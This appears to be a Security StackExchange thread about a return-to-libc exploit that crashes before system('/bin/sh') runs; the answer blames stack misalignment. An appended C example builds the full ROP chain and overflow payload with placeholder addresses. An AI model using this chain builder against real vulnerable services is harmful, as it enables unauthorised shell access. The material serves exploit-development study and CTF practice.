I'm doing a pretty bog-standard return-to-libc attack and I'm in a bit of a pickle.

I first got the entire attack working with my local version of libc, then I used the version of libc provided by the challenge to work out the offsets on the remote target. It doesn't work on remote, so I start up an Ubuntu Bionic container, LD_PRELOAD their version of libc, and fire up gdb to see what's up.

The attack works, I ROP to a gadget, the gadget loads "/bin/sh" into RDI, and then I crash.

Any ideas what I should be looking for here? Again this whole setup works with the identical binary linking against newer versions of libc.

ASLR, stack protection, and NX are all turned on, not that I think it matters for this attack.

  • Please do not post images of text. Copy/Paste and use the code formatting tool. Your image is very difficult to read.
    – schroeder
    Commented Jul 1, 2021 at 7:24
  • @schroeder I mean, the picture is just there for flavor. All of the information is provided in the text. Anyway closing the question, it was an alignment issue
    – nickelpro
    Commented Jul 1, 2021 at 7:27
  • Can't read the picture, so it's not providing anything
    – schroeder
    Commented Jul 1, 2021 at 7:28
  • Exactly and it's not supposed to, it's just "there for flavor". All of the information is in the text of the post
    – nickelpro
    Commented Jul 1, 2021 at 7:28
  • It was not adding "flavour" it was adding a color box. I have removed it to remove confusion since it was not adding anything.
    – schroeder
    Commented Jul 1, 2021 at 7:38

1 Answer


Alignment: ensure the stack is aligned following the ROP; otherwise any instruction that requires an aligned stack will go haywire.

  • Since you didn't say it, a simple way to ensure this is to add a simple gadget to a ret before you call system.
    Commented Sep 28, 2021 at 22:36
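As an added worked example (not code from the question, the answer or the comments): a small C builder for the ret2libc chain the question describes (pop rdi; ret -> &"/bin/sh" -> system) that applies the fix from the answer and the comment automatically. On x86-64 the SysV ABI requires rsp+8 to be 16-byte aligned at function entry, i.e. rsp % 16 == 8, and glibc's system() contains SSE instructions (movaps) with stack operands that fault when this does not hold. A classic three-slot chain lands system() with rsp % 16 == 0, so one extra `ret` gadget (8 bytes) restores alignment. Every address below (gadgets, "/bin/sh", system, the saved RIP) is a made-up placeholder and an assumption of this example; a real exploit takes them from the target binary and its libc.

```c
/* ret2libc chain builder that fixes x86-64 stack alignment.
 * All addresses are hypothetical placeholders for illustration (assumptions,
 * not values from the post); a real exploit fills them from the target. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POP_RDI_RET  0x0000000000401203ULL  /* pop rdi ; ret  (in the binary) */
#define RET_GADGET   0x000000000040101aULL  /* ret            (in the binary) */
#define BIN_SH_STR   0x00007f12345a5aa0ULL  /* "/bin/sh" inside libc */
#define SYSTEM_ADDR  0x00007f1234530000ULL  /* system() inside libc */

#define MAX_SLOTS   16
#define MAX_PAYLOAD 512

struct chain {
    uint64_t slot[MAX_SLOTS];
    size_t n;
};

static void push(struct chain *c, uint64_t v)
{
    if (c->n < MAX_SLOTS)
        c->slot[c->n++] = v;
}

/* rsp right after a `ret` has popped slot i of a chain that starts at
 * ret_slot_addr (the address of the saved return address we overwrite). */
static uint64_t rsp_after_ret(uint64_t ret_slot_addr, size_t i)
{
    return ret_slot_addr + 8 * (i + 1);
}

/* SysV x86-64 ABI: at function entry rsp+8 is 16-byte aligned, so
 * rsp % 16 must equal 8. glibc's system() uses movaps on stack slots and
 * faults if a ROP chain enters it with any other alignment. */
int entry_aligned(uint64_t rsp_at_entry)
{
    return rsp_at_entry % 16 == 8;
}

/* Build: pop rdi ; ret -> &"/bin/sh" -> [ret padding] -> system.
 * Returns a pointer to static storage so callers need no setup. */
const struct chain *build_chain(uint64_t ret_slot_addr)
{
    static struct chain c;
    c.n = 0;
    push(&c, POP_RDI_RET);
    push(&c, BIN_SH_STR);
    /* system() would be entered with rsp = address of the slot after it. */
    if (!entry_aligned(rsp_after_ret(ret_slot_addr, c.n)))
        push(&c, RET_GADGET);   /* one extra ret shifts rsp by 8 */
    push(&c, SYSTEM_ADDR);
    return &c;
}

/* Total payload length: pad is the distance from the overflowed buffer
 * to the saved RIP; each chain slot is 8 bytes. */
size_t payload_len(size_t pad, uint64_t ret_slot_addr)
{
    return pad + 8 * build_chain(ret_slot_addr)->n;
}

/* Serialise padding + little-endian chain into a static buffer. */
const uint8_t *build_payload(size_t pad, uint64_t ret_slot_addr)
{
    static uint8_t buf[MAX_PAYLOAD];
    const struct chain *c = build_chain(ret_slot_addr);
    if (pad + 8 * c->n > MAX_PAYLOAD)
        return NULL;
    memset(buf, 'A', pad);
    for (size_t i = 0; i < c->n; i++)
        for (int b = 0; b < 8; b++)
            buf[pad + 8 * i + b] = (uint8_t)(c->slot[i] >> (8 * b));
    return buf;
}

int main(void)
{
    /* A saved RIP normally sits at an address with low nibble 8, because
     * `call` pushes it onto a 16-byte-aligned stack (hypothetical value). */
    uint64_t saved_rip = 0x00007ffc1234f678ULL;
    const struct chain *c = build_chain(saved_rip);
    for (size_t i = 0; i < c->n; i++)
        printf("slot %zu @ %#llx : %#llx\n", i,
               (unsigned long long)(saved_rip + 8 * i),
               (unsigned long long)c->slot[i]);
    return 0;
}
```

Run as-is, build_chain() inserts the `ret` gadget because the three-slot chain would enter system() with rsp % 16 == 0; change the saved-RIP placeholder to an address with low nibble 0 and the padding disappears. In gdb the check is the same: break on system and confirm `$rsp & 0xf` is 8.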
